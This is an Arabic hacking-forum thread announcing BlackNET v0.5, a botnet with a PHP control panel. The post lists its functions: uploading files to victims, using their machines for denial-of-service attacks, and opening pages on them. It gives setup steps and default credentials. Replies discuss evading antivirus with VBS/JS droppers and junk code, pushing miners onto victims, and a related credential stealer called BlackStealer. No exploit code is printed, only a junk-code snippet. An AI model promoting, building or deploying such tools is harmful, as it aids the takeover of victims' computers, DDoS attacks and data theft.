BlackNET v0.5 حـمـايـة أفـضـل و اتـصـال ثـابـت

تم تحميل الصفحة في 1,4571604 ثانية
BlackNET v0.5 حـمـايـة أفـضـل و اتـصـال ثـابـت
إنضم
5 أغسطس 2011
المشاركات
3,055
الإعجابات
3,522
النقاط
123
العمر
23
الإقامة
][ الـمـمـلـكه الـعـربـيه الـسـعـوديـه ][

بسم الله الرحمن الرحيم
و الصلاة و السلام على اشرف الانبياء و المرسلين نبينا محمد و على اله و صحبه اجمعين
السلام عليكم و رحمة الله وبركاته
اسعد الله مسائكم يا اعضاء الـDev-Point
من مطورين و مبرمجين و إداريين
نعود بالجديد و المفيد لهذا الصرح الجميل





الاسم : BlackNET
الاصدار : 0.5
الوظيفه : شبكة بوت نت
منصه العمل : PHP و نت فريم ورك2 و بايثون 2.7
المبرمج : Black.Hacker



1. رفع ملفات على جهاز الضحية
2. استخدام الضحية لعمل هجمات حجب خدمة
3. عرض مربع رسالة للضحية
4. فتح صفحة ويب للضحية
5. هجوم حجب خدمة بسيط على لنكس
طباعة رسالة فالتيرمنات لينكس





مالجديد
1. إتصال ثابت و اسرع
2. تم تنظيف كود المشروع من الشوائب و ترتيبة
3. إتصال أمن بقاعدة البيانات
4. إعدادات تغير الرقم السري للادمن
5. نظام تسجيل دخول امن و افضل من السابق
6. Salted MD5
7. إعادة كتابة المشروع على هيئة كلاسات OOP و إتصال PDO
8. إصلاح بعض الاخطاء
9. إصلاح ثغرة الـSQL Injection [ شكراً الممَلكة ]



طريقة تثبيت الPHP Panel
1. حمل ملف BlackNET - PHP Panel.zip
2. ارفع الملف المظغوط على السيرفر
3. استخرج الملف المظغوط.
4. ادخل على PHPMyAdmin
5. سو قاعدة بيانات
5. عدل على ملف الclasses/database.php بالبيانات حقتك
6. ادخل على install.php و اظغط على زر Install


البيانات الاساسية للدخول للوحة تحكم الشبكة
اسم المستخدم : admin
كلمة المرور : admin







إثبات عمل البرنامج







 

SuLtAn YE

معتزل للاخير
rankrank
إنضم
2 يوليو 2016
المشاركات
164
الإعجابات
109
النقاط
43
الإقامة
في أحضان الندم
مبدع..
هل هناك امكانية تغيير الناتج من exe
الى vbs او js لتسهيل عملية التخطي

ابدعت اتمنى لك التقدم 🌹
 
إنضم
29 يوليو 2011
المشاركات
1,025
الإعجابات
263
النقاط
83
العمر
22
مشكور على هذا الموضوع الرائع.
سؤال : هل هناك خاصية رفع و تنصيب او تشغيل برنامج عند الضحية ؟
مثلا برنامج تعدين ؟
 
إنضم
5 أغسطس 2011
المشاركات
513
الإعجابات
445
النقاط
63
الإقامة
0x400000
السلام عليكم
برمجة موفقة رغم ان الستايل البرمجة ( اسم الدوال ـ اسم المتغيرات ) مشابه كثيرا لبرنامج NJ 11d الذي تبين انه يسرق الضحايا . المهم هذا ليس موضوعنا .
البرمجة جميلة جدا و ما اعجبني انه يمكن تحويلها ليصبح السرفر كانه سرفر دودة هوديني يكفي تغيير اسماء الـ Commands و الـ Splitter و اسم الصفحة ...
واجهني عند تحليل برنامجك انه بعض من الـ arrays مشفرة بطريقة شرحتها سابقا لكن للآسف توقفت بسبب dnSpy
هذا الـ array يحتوي على عنصرين مشفرين بالخوارزمية التي ذكرت و لما اعمل BruteForce للمفتاح لا اجد الا نصوص متتابعة عكسيا FEDBCA ...
هل يستعمل طريقة لا اذكر من شرحها هل حازم ام بشار ( لاني اتذكر ليس حلاج من شرحها ) التي تاخذ عنصر محدد من مصفوفة . لا اعرف هل فاتني شيء ما ؟
بالنسبة لتخطي برامج الفحص فالطريقة قديمة لا تعمل فالكل اصبح يغير اسم الادوات و كما الاخ اسمبلي او اليكس ان كنت اتذكر تشغيل مراقب الشبكة يكون خارج الوهمي لتجنب اي تخطي محتمل
بانتظار ردك حول فائدة ذلك الـ array
 
إنضم
5 أغسطس 2011
المشاركات
3,055
الإعجابات
3,522
النقاط
123
العمر
23
الإقامة
][ الـمـمـلـكه الـعـربـيه الـسـعـوديـه ][
السلام عليكم
برمجة موفقة رغم ان الستايل البرمجة ( اسم الدوال ـ اسم المتغيرات ) مشابه كثيرا لبرنامج NJ 11d الذي تبين انه يسرق الضحايا . المهم هذا ليس موضوعنا .
البرمجة جميلة جدا و ما اعجبني انه يمكن تحويلها ليصبح السرفر كانه سرفر دودة هوديني يكفي تغيير اسماء الـ Commands و الـ Splitter و اسم الصفحة ...
واجهني عند تحليل برنامجك انه بعض من الـ arrays مشفرة بطريقة شرحتها سابقا لكن للآسف توقفت بسبب dnSpy
هذا الـ array يحتوي على عنصرين مشفرين بالخوارزمية التي ذكرت و لما اعمل BruteForce للمفتاح لا اجد الا نصوص متتابعة عكسيا FEDBCA ...
هل يستعمل طريقة لا اذكر من شرحها هل حازم ام بشار ( لاني اتذكر ليس حلاج من شرحها ) التي تاخذ عنصر محدد من مصفوفة . لا اعرف هل فاتني شيء ما ؟
بالنسبة لتخطي برامج الفحص فالطريقة قديمة لا تعمل فالكل اصبح يغير اسم الادوات و كما الاخ اسمبلي او اليكس ان كنت اتذكر تشغيل مراقب الشبكة يكون خارج الوهمي لتجنب اي تخطي محتمل
بانتظار ردك حول فائدة ذلك الـ array
???
ايت array مشفر
البرنامج مفتوح المصدر و مافيه اي شي مشفر
و السورس كامل موجود لو تبغا تستعرضة

وطريقة التخطي مهو كل الناس محترفين لن التخطي برضوا على برامج بسيطة فالوندوز مثل مستعرض العمليات
 
إنضم
5 أغسطس 2011
المشاركات
3,055
الإعجابات
3,522
النقاط
123
العمر
23
الإقامة
][ الـمـمـلـكه الـعـربـيه الـسـعـوديـه ][
إنضم
18 يوليو 2015
المشاركات
4,828
الإعجابات
8,639
النقاط
133
الإقامة
Republic Of Bahrain
السلام عليكم
برمجة موفقة رغم ان الستايل البرمجة ( اسم الدوال ـ اسم المتغيرات ) مشابه كثيرا لبرنامج NJ 11d الذي تبين انه يسرق الضحايا . المهم هذا ليس موضوعنا .
البرمجة جميلة جدا و ما اعجبني انه يمكن تحويلها ليصبح السرفر كانه سرفر دودة هوديني يكفي تغيير اسماء الـ Commands و الـ Splitter و اسم الصفحة ...
واجهني عند تحليل برنامجك انه بعض من الـ arrays مشفرة بطريقة شرحتها سابقا لكن للآسف توقفت بسبب dnSpy
هذا الـ array يحتوي على عنصرين مشفرين بالخوارزمية التي ذكرت و لما اعمل BruteForce للمفتاح لا اجد الا نصوص متتابعة عكسيا FEDBCA ...
هل يستعمل طريقة لا اذكر من شرحها هل حازم ام بشار ( لاني اتذكر ليس حلاج من شرحها ) التي تاخذ عنصر محدد من مصفوفة . لا اعرف هل فاتني شيء ما ؟
بالنسبة لتخطي برامج الفحص فالطريقة قديمة لا تعمل فالكل اصبح يغير اسم الادوات و كما الاخ اسمبلي او اليكس ان كنت اتذكر تشغيل مراقب الشبكة يكون خارج الوهمي لتجنب اي تخطي محتمل
بانتظار ردك حول فائدة ذلك الـ array
هل تقصد هذه الحماية البرمجية
Hallaj Protection - CSharp
لان لم يستطع احد فكها لليوم بدون ال key
 
إنضم
5 أغسطس 2011
المشاركات
513
الإعجابات
445
النقاط
63
الإقامة
0x400000
هل تقصد هذه الحماية البرمجية
Hallaj Protection - CSharp
لان لم يستطع احد فكها لليوم بدون ال key
اهلا اخي حلاج
الموضوع صار له اكثر من 3 سنوات لذلك لم اتكمن من تحميل الملف
لكن تذكرت الطريقة التي كانت هي عطب الملف ( الطريقة التي استلهمت منها الفكرة )
هذه الطريقة قوية جدا و لها اكثر من تطبيق مثل صنع Ransomware ( لن اتكلم اكثر عن ذلك لانه تخريبي لاقصى درجة )
ما اتكلم عنه هو هذا الـ array الذي يظهر في الصورة



يظهر كثيرا في البرنامج و يحمل قيم مختلفة لكنه غير مستعمل
 
إنضم
5 أغسطس 2011
المشاركات
3,055
الإعجابات
3,522
النقاط
123
العمر
23
الإقامة
][ الـمـمـلـكه الـعـربـيه الـسـعـوديـه ][
اهلا اخي حلاج
الموضوع صار له اكثر من 3 سنوات لذلك لم اتكمن من تحميل الملف
لكن تذكرت الطريقة التي كانت هي عطب الملف ( الطريقة التي استلهمت منها الفكرة )
هذه الطريقة قوية جدا و لها اكثر من تطبيق مثل صنع Ransomware ( لن اتكلم اكثر عن ذلك لانه تخريبي لاقصى درجة )
ما اتكلم عنه هو هذا الـ array الذي يظهر في الصورة



يظهر كثيرا في البرنامج و يحمل قيم مختلفة لكنه غير مستعمل
لو فتحت السورس راح تحصل فيه ملف اسم Junkcode هيه عباره عن اكواد Junk بدون فايدة عشان تزيد حجم البرنامج و بعض الاحيان تفيد فالتشفير من الحمايات الضعيفة
الarrays هاذي موجوده فملف الـjunkcode
 
إنضم
18 يوليو 2015
المشاركات
4,828
الإعجابات
8,639
النقاط
133
الإقامة
Republic Of Bahrain
اهلا اخي حلاج
الموضوع صار له اكثر من 3 سنوات لذلك لم اتكمن من تحميل الملف
لكن تذكرت الطريقة التي كانت هي عطب الملف ( الطريقة التي استلهمت منها الفكرة )
هذه الطريقة قوية جدا و لها اكثر من تطبيق مثل صنع Ransomware ( لن اتكلم اكثر عن ذلك لانه تخريبي لاقصى درجة )
ما اتكلم عنه هو هذا الـ array الذي يظهر في الصورة



يظهر كثيرا في البرنامج و يحمل قيم مختلفة لكنه غير مستعمل
عطب الملف قديمة نوعا ما من 2008 اتذكر كان في برنامج يستخدمها اسمه asprotect
يتم عطب الملف التنفيذي وبعد ذلك عمل stolen bytes في الـ runtime من الـ OEP الا هي نقطة الادخال الاصلية
يمكن تصحيحه بسهولة وكسره الافضل تشفيره بمفتاح غير متناظر مثل الـ
ransomware لن تستيطع فكه بدون private key
بخصوص string array : واضح انها junkcode مجرد اكواد عشوائية ليس لها استدعاء حسب قرائتي للسورس لم احلل الـ compiled للامانة
هذا الي وجدته في السورس وليس الـ
compiled :
كود:
Dim yPKGFkovZyWZYIqbgkBNx As Integer = 542
        Dim uAepyFPZGhbqfCmKHQMbCoQloFppZVLHddNvEZkjuKTqgGwUIeZQoFhEjrAsPaykV As UInt64 = 7145
        Dim XTXDTDoiksqLFHISLZMBxSHXGjExNjGZBBMSPNBBoxPRhZkBoUbbvgaELzwixqUzkRKEupCxXLLBDppfyCJsIfeUZHGPQTDzcPeQPfGzReDkVaBVKQivhbrGnqeojmgEHMYnKZRSwJbcbsxzGk() As String = {"fOPrTrcVKTbkbrTDXhzWhQOemWYwZZaAbOuGzZdLJFCbb", "qHwWlrkApuhfkyXkwqPmpvHYriMdFBGTWOnWVcMKd"}
        Do Until 8 = 12107304
            Dim hIMEvDNpVNVIpcNblOOhyxHKzWCwZQwfuFVGVyXwTtDJpFoWaDjxoQjjABFZBRQEPoNiGHGorQPFuyUtheVWgyqdVkFUtwuCdxtBsFPSvwHXBdpChLrVutYQxhNVCmttVNbvDSBcQDZjrTcqvCmhGZHkZcDJqtQKBNCoDtzOJPFrToYeEWazzMmuFpVZPrkWnPieRpoBDYYqVPRmFYFVTQKpZHiMZZxRdiEDGuMPh As Int64 = 5
        Loop
        If 1 <> 2 Then
            MessageBox.Show("kWLejBtNeGxnZeqXZVnlYNHGPwVMauECSetYLhOIkAIowgyYCYFYfFXYOEPmeimjBvVtjRMqGfzYFSKhywJBpfWMHWKGRbcDNYnzLDnkMNSAFzSwugmgYluVZImOHGadCvKgeKXtJYnbNVHIENLjovdacSZCRZdGmoxJnkSkJrXAwTIEBdKtuqoHRhDMlUcjsioYYxTSuaZvXdfKJUBmPkLwAprGgGypOnGOdjfDJ")
            Dim wicheaTdlheojaZKWCUEHVaWCkcqNSeijUBLTrgCwooSx As Double = 9702
        End If
        While 2 <> 87
 
إنضم
5 أغسطس 2011
المشاركات
513
الإعجابات
445
النقاط
63
الإقامة
0x400000
نعم صحيح هناك طرق مشابهة تستخذم في بعض الحمايات Stolen Bytes
اما بالنسبة للـ Junk Code فمن تجربتي يجب ان يكون مختلف بين السيرفرات حتى لا يصبح مثل توقيع يميز نوع السرفرات
نفس الشيء كان يحدث ايام الـ RunPE في VB6
بالنسبة للتشفير الذي تحدث عنه هو خاص بالاندكس يتم في اختيار عناصر من معلومة من String المشفر او موقع عبر ارقام Index فمثلا في الـ "Scjfjfeckkrthisisjunkvkxioeicior" ليصبح Server يجب فقط اخذ 0 - 6 ...
فكرة Junk Code ليست سيئة ابدا خصوصا في الدوت نت الذي يسهل فيه نسبيا استخراج السورس مع تطور الحمايات في هذا السياق
 
إنضم
5 أغسطس 2011
المشاركات
3,055
الإعجابات
3,522
النقاط
123
العمر
23
الإقامة
][ الـمـمـلـكه الـعـربـيه الـسـعـوديـه ][
مبدع صراحة معجب باعمالك .
اتمنى ان تصلح نسخة برنامج Blacksteler فهو لا يتصل بموقع DriveHQ
للاسف BlackStealer توقفت عن تطويره
إذا حصلت النسخة الاخيرة تراها تشتغل على اي FTP مهو لازم DriveHQ
ممكن فالمستقبل يكون فيه إصدار جديد مع PHP Panel للتحكم باليوزرات

بالتوفيق
 
إنضم
27 مايو 2016
المشاركات
912
الإعجابات
590
النقاط
183
العمر
25
للاسف BlackStealer توقفت عن تطويره
إذا حصلت النسخة الاخيرة تراها تشتغل على اي FTP مهو لازم DriveHQ
ممكن فالمستقبل يكون فيه إصدار جديد مع PHP Panel للتحكم باليوزرات

بالتوفيق
ممتاز مثل هذا العمل بالتوفيق
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل